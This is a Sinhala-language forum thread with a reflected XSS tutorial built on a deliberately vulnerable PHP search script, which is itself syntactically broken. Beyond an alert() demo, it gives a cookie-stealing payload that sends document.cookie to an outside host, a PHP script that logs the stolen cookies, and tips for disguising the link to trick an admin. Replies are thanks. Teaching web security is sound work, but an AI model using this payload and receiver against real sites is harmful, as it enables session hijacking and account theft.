ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] Reflected XSS tutorial
#1
Wink 
Hello guys,
ඔන්න අවුරුදු තුනකට විතර පස්සේ ආයෙත් සිංහල ටියුට් එකක් ලියන්න පටන් ගත්තා . මේකෙන් මන් කතා කරන්න යන්නෙ Cross Site Scripting වල එක කොටසක් ගැන. මේ Reflected  Cross Site Scripting. මේ වුල්නරබිලිටි එක ගොඩක් අය හිතන්නේ  අඩු රිස්ක් එකක් තියෙන වුල්නරබිලිටි  එකක් කියලා තමා. හරි අපි කොහොමහරි මේකෙන් වෙන්නෙ මොකක්ද කරන්න පුලුවන් මොනවද ඔය ඔක්කොම ඉගෙන  ගන්න ට්‍රයි එකක් දෙමු.
මුලින්ම බලමු මේකට අදාල තියරි පාර්ට් එක.
අපි හිතමු පල්ලෙහා තියෙන  විදිහේ වෙබ් ඇප්ලිකේශන් එකක් තියෙනවා. මේකෙන්  යූසර්ගෙන් මොකක් හරි ඉන්පුට් එකක් ඇරගෙන ඒක මොනවහරි  ක්‍රියාවලියකට ලක් කරලා අපිට අවුට්පුට් එකක් දෙනවා. අපි බලමු මේකෙ කෝඩ් එක මොන වගේද කියලා.


Server side part

<?php 
include find.php

if(isset$_GET['string']){
   str =  $_GET['string']
   $results = array()

   if (findItems(str)) {
      echo "We have following  items for your keyword";
      foreach ($results as $item) {
        echo "$item <br>";
      }
   } else {
        echo "Found nothing for your keyword" . str . "!" ;
   }
}
?>



අපි හිතමු ඔය php ස්ක්‍රිප්ට් එක widane.com එකේ හොස්ට් කරලා තියෙනවා කියලා. එතකොට ඒකේ URI එක widane.com/find.php වගේ කියලත් උපකල්පනය කරමු. මන් කෙටියෙන් පැහැදිලි කරන්නම් මේ ස්ක්‍රිප්ට් එකෙන් වෙන දේ.

මුලින්ම මේකෙන් බලන්නේ URL එකේ str කියලා පැරාමීටර් එක්ක් තියෙනවාද  කියන එක. එහෙම parameter එකක් තියෙනවානම් ඒක str කියන variable එකට assign කරනවා.( සරලව හිතන්න සමාන කරනවා කියලා).
ඊළඟට කරන්නේ findItems() කියන ෆන්ක්ශන් එකෙන් යූසර් ඉන්පුට් කරන keyword" එක සර්ච්කරන එක. මේ වර්ඩ් එකට අදාල අයිටම් තියෙනවනම් ඒවා අවුට්පුට් කරනවා. සර්ච් රිසාල්ට්ස් මොනවත් නැත්නම් එරර් මැසේජ් එකක් එක්ක යූසර් ඉන්පුට් කරපු key word එකත් ඩිස්ප්ලේ වෙනවා.

ඉතින් මෙතන තියෙන වැරැද්ද /වුල්නරබිලිටි  එක මොකක්ද? . මෙතන ඇප්ලිකේශන්  එකෙන් වෙන්න ඕනෙ දේ හරියටම වෙනවා. ඒත් මෙතනදි යූසර් ඉන්පුට් කරන string එක කිසිම ෆිල්ටර් කිරීමක් වෙන්නෙ නෑ. අපි ඉන්පුට් කරන ඕනෙම විදිහෙ ස්ට්‍රින්ග් එකක් ආපහු අවුට්පුට් කරනවා ඒකට අදාල අයිටම්ස් නැත්නම්. මේ Vulnerability එකට අපි කියනවා Cross Site Scripting කියලා.

Inject a JavaScript

දැන් අපි බලමු මේකෙන් කරන්න පුලුවන්  මොනවද කියලා. XSS කියපු ගමන්ම මතක් වෙන්නේ ඉතින් Alert box එකක්නේ. මුලින්ම බලමු ඒක වෙන්නෙ  කොහොමද කියලා. මන් නෙහෙම දෙයක් ඉන්පුට් කරොත් මොකද වෙන්නෙ ?


<script>alert('XSS')</script>


දැන් අපේ URL එක මේ වගේ  වෙනවා .

widane.com/find.php?str=<script>alert('XSS')</script>



PHP කෝඩ් එකෙන් අපේ str parameter එක අරගෙන ඒකට අදාල අයිටම්ස්  නැති නිසා එරර් මැසේජ් එකත් එක්ක ඔය ඉන්පුට් එකත් අවුට්පුට් කරනවා.

Found nothing for your keyword  <script>alert('XSS')</script>  !



මේක බ්‍රවුසර් එකට ආපු ගමන් ඒකෙන් <script> හා </script> ඇතුළත තියෙන ඕනෙම දෙයක් දකින්නේ සාමාන්‍ය  JavaScript කෝඩ් එකක් විදිහට. ඉතින් බ්‍රවුසර්  එකෙන් දෙපාරක් හිතන්නෙ නැතුව මේ කෝඩ් එක execute කරනවා.

[Image: t2MFHgvl.png]

What else we can do?

දැන් ත්ව ප්‍රශ්නයක් තියෙනවා .xss වලින් කරන්න පුලුවන් ඔය ටික විතරද? නෑ තව ගොඩක් Payloads තියෙනවා. මේවගෙන් ගොඩක් malicious Payload එකක් තමා session hijacking කියන එක. මෙතනදි වෙන්නේ victim ගේ session එක අපි පාවිච්චි කිරීමක් .ගොඩක් වෙලාවට කරන්නේ cookie එක steal කරන එක තමා. මම සරල විදිහට මේක පැහැදිලි කරොත් වෙන්නේ මෙහෙම දෙයක්. හිතන්න මට මේ සයිට් එක ඩිෆේස් කරන්න ඕනෙ. මම මේක විසිට් කරනකොට දකිනවා අර උඩ තිබ්බ වෙබ් පේජ් එක. ඒකෙන් යූසර් ඉන්පුට් එකක් ගන්නවා. වෙබ් ඇප්ලිකේශන්  එකක වුල්නරබිලිටි එකක් තියෙන්න ලොකුම ඉෆක් තියෙනවා මේ ඉන්පුට් ෆන්ක්ශන් වල. ඉතින් මන් jddjsjj"<> වගේ random ස්ට්‍ර්රින් එකක් ගහලා බලනවා. මෙතනදි මන් දකිනවා යූසර් ඉන්පිට් එක ෆිල්ටර් කරන්නේ නැතුව අවුට්පුට් කරනවා.දැන් මට මේකෙන් සයිට් එක ඩිෆේස් කරන්න ට්‍රයි කරන්න පුලුවන්. (මෙහෙම වුල්නරබිලිටි එකක් දැක්ක ගමන් කරන්න ඕනෙ මේක stored  xss වලට හරි [Only registered and activated users can see links Click here to register]වලට වගේ හරවගන්න පුලුවන්ද කියලා. මන් ඒ ගැන මෙතනදි කතා කරන්න යන්නේ නෑ.)

මට කොහොමහරි ඇඩ්මින් කෙනෙක්ගේ cookie  එකක් ගන්න පුලුවන්න්ම් මගේ browser එකේ cookie  වෙනුවට අර ගත්ත එක රීප්ලේස් කරලා session එක hijack කරන්න පුලුවන්.
<img src=”http://hacksland.net/catch.php?cookie =”+document.cookie>


දැන් අපේ සම්පූර්ණ payload එක මේ වගේ එකක්.

widane.com/find.php?str=<img src=”http://hacksland.net/catch.php?cookie =”+document.cookie>



මට දැන් කරන්න තියෙන්නේ කවුරු හරි ඇඩ්මින් කෙනෙකුට ඔය url දෙන එක. එක්කො මට tinyurl වගේ සර්විස් එකක් යූස් කරලා ඕක short කරලා දෙන්න පූවන්. ඒ වගේම url encoding යූස් කරලත් සැක හිතෙන එක අඩු කරන්න පුලුවන්. අපි උපකල්පනය කරමු මේකෙ ඇඩ්මින් කෙනෙක් ඔය වගේ URL එකක් විසිට් කරන්න තරම් මෝඩ උනා කියලා. දැන් මට කරන්න තියෙන්නෙ මගේ සර්වර් එකේ තියෙන catch.php එකෙන් අර cookie එක අරගෙන මගේ browser එකට ඉන්ජෙක්‍ට් කරන එක. ඒක කරන්න add-ons තියෙනවා.

<?php
$cookie = $_GET[“cookie”];
$file = fopen(“data.txt”, “a”);
fwrite($file, $cookie .”\n”);
fclose($file);
?>



තව විදිහක් තියෙනවා මේ විදිහේ ඇටෑක් එකක් කරන්න. අපිට පුලුවන් මගේ සයිට් එකේ වෙනම පේජ් එකක් හදන්න. මන් ඒකෙ img ටැග් එකක් දාලා ඒකෙ src විදිහට දානවා අපේ ඔය url එක. එතකොට වික්ටිම් අපේ ලින්ක් එක මැනුවලි click කරන්න ඕනේ වෙන්නෙ නෑ.




මෙතන අපැහැදිලි තැන් ටිකක් තියෙනව කියලා මන් හිතනවා. එකක් තමා අපි මොකටද cookie එක steal කරන්න victim සයිට් එකම යූස් කරන්නෙ? ඇයි අපිට බැරි  එක අපේ සයිට් එකේම JavaScript එකක් රන් කරලා cookie ගන්න? මේ  දේවල් ටියුට් එකේම කතාකරනවාට වඩා හොඳයි live conversation එකක් විදිහට යන එක. එතකොට හැමෝම දන්න නොදන්න දේවල් එකතු කරන්න පුලුවන්. 

ඇත්තටම mybb වගේ software එකක් ඇටෑක් කරන එකනම් මේතරම් ලේසි නෑ. මන් මේක පැහැදිලි කන්න උදාහරණයක් විදිහට තමා මේක ගත්තේ. කට්ටිය මොනවා හරි දෙයක් ඉගෙන ගන්න ඇති කියලා හිතනවා. තව් ටියුට් ඕනේ මාතෘකා තියෙනවානම් කමෙන්ට් එකක් දාන්න.
B.Sc Engineering Student
gov. university of Pera.
Admin At [Only registered and activated users can see links Click here to register]
#2
Elama Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries: [email protected] 
Reply
#3
XXE, SSRF

වටිනව මචන්
Damn.. There's a little bit of devil in her angel eyelove love

Reply
#4
Supiri bn, thanks
Reply
#5
adugane meke thiyena varaddakvath kiyapallako bn. :-p . aluth deval share karagannanm comment tikak dapiyavu nikamma inne nathuva. hamoma danna nodanna dewal igena ganna puluvan ethakota. forum ekak kiyanne ehemane. :-)
B.Sc Engineering Student
gov. university of Pera.
Admin At [Only registered and activated users can see links Click here to register]
Reply
#6
තෑම්ස් සින්හලෙම් ලියුවට
Reply
#7
එලම.. සෑහෙන්න වටිනව...
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass - Video Tutorial Elite_x 1 365 05-07-2019, 05:18 AM
Last Post: Mmx
Star [Tut] Pen-testing tutorial - 002 [තේරෙන සිංහලෙන්] | SQL injection Elite_x 19 2,785 03-26-2019, 10:58 AM
Last Post: holmantora
Star [Tut] Pen-testing tutorial - 003 [තේරෙන සිංහලෙන්] | Login Bypass Elite_x 12 2,037 03-08-2019, 03:55 PM
Last Post: Elite_x
Star [Tut] Pen-testing tutorial - 001 [තේරෙන සිංහලෙන්] Elite_x 14 3,172 01-29-2019, 01:02 PM
Last Post: OWL99



Users browsing this thread: 1 Guest(s)